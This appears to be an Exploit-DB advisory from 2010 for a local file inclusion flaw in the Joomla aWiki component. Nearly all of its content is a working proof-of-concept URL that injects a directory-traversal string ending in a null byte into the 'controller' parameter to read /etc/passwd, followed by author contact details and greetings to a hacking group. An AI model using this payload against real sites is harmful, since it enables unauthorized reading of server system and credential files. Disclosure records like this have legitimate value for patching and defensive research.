Joomla! Component aWiki - Local File Inclusion

EDB-ID:

12101

CVE:

N/A




Platform:

PHP

Date:

2010-04-07


(o)===============================================================================(o)

                  Joomla Component aWiki Local File Inclusion


                Vendor   : http://joomla.anezi.net/awiki
                Author    : Angela Zhang
                Contact  : mizz_4ng3l@yahoo.com
                Date        :   05 - April - 2010

(o)================================================================================(o)

     [o] Exploit
 
       http://localhost/[path]/index.php?option=com_awiki&controller=[LFI]
 
 
    [o] PoC
 
       http://localhost/index.php?option=com_awiki&controller=../../../../../../../../../../../../../../../etc/passwd%00



(o)==================================================================================(o)

Greetz   :   -:-  SkyCreW  -:-

     Nyubi (Solpot) , Vrs-hCk , OoN_BoY , NoGe , Paman , zxvf ,   home_edition2001   ,   mywisdom , s4va, 
     Winda Slovski , stardustmemory, wishnusakti, Xco Nuxco , Cakill Schumbag, dkk
     
(o)===================================================================================(o)